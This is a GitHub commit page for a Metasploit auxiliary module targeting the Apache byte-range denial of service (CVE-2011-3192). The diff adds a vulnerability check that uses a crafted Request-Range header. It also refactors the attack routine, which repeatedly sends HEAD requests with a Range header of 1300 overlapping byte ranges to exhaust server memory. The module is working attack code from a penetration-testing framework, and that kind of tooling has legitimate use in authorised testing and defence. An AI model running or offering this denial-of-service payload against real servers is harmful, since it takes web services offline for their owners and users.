Skip to content
Browse files

Lands #1169 - Adds a check

[Closes #1169]

Conflicts:
	modules/auxiliary/dos/http/apache_range_dos.rb
  • Loading branch information...
2 parents dfff20a + 882b084 commit a09b3b80239743d89ca85f496c88e3e7ecaffee2 @wchen-r7 wchen-r7 committed Apr 22, 2013
Showing with 67 additions and 14 deletions.
  1. +67 −14 modules/auxiliary/dos/http/apache_range_dos.rb
View
81 modules/auxiliary/dos/http/apache_range_dos.rb
@@ -9,7 +9,10 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WmapScanFile
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
include Msf::Auxiliary::Dos
def initialize(info = {})
@@ -24,45 +27,95 @@ def initialize(info = {})
'Author' =>
[
'Kingcope', #original discoverer
- 'Masashi Fujiwara' #metasploit module
+ 'Masashi Fujiwara', #metasploit module
+ 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
],
'License' => MSF_LICENSE,
+ 'Actions' =>
+ [
+ ['DOS'],
+ ['CHECK']
+ ],
+ 'DefaultAction' => 'DOS',
'References' =>
[
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
[ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
- 'DisclosureDate' => 'Aug 19 2011'))
+ 'DisclosureDate' => 'Aug 19 2011'
+ ))
register_options(
[
Opt::RPORT(80),
OptString.new('URI', [ true, "The request URI", '/']),
- OptInt.new('RLIMIT', [ true, "Number of requests to send", 50])
+ OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
], self.class)
end
- def run
+ def run_host(ip)
+
+ case action.name
+ when 'DOS'
+ conduct_dos()
+
+ when 'CHECK'
+ check_for_dos()
+ end
+
+ end
+
+ def check_for_dos()
+ path = datastore['URI']
+ begin
+ res = send_request_cgi({
+ 'uri' => path,
+ 'method' => 'HEAD',
+ 'headers' => {
+ "HOST" => "Localhost",
+ "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
+ }
+ })
+
+ if (res and res.code == 206)
+ print_status("Response was #{res.code}")
+ print_status("Found Byte-Range Header DOS at #{path}")
+
+ report_note(
+ :host => rhost,
+ :port => rport,
+ :data => "Apache Byte-Range DOS at #{path}"
+ )
+
+ else
+ print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+
+ def conduct_dos()
uri = datastore['URI']
+ rhost = datastore['RHOST']
ranges = ''
for i in (0..1299) do
ranges += ",5-" + i.to_s
end
for x in 1..datastore['RLIMIT']
begin
- connect
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'HEAD',
+ 'headers' => {
+ "HOST" => rhost,
+ "Range" => "bytes=0-#{ranges}"}},1)
- sploit = "HEAD " + uri + " HTTP/1.1\r\n"
- sploit << "Host: " + rhost + "\r\n"
- sploit << "Range: bytes=0-" + ranges + "\r\n"
- sploit << "Accept-Encoding: gzip\r\n"
- sploit << "Connection: close\r\n\r\n"
-
- sock.put(sploit)
- disconnect
rescue ::Rex::ConnectionRefused
print_status("Unable to connect to #{rhost}:#{rport}.")
rescue ::Errno::ECONNRESET

0 comments on commit a09b3b8

Please sign in to comment.
Something went wrong with that request. Please try again.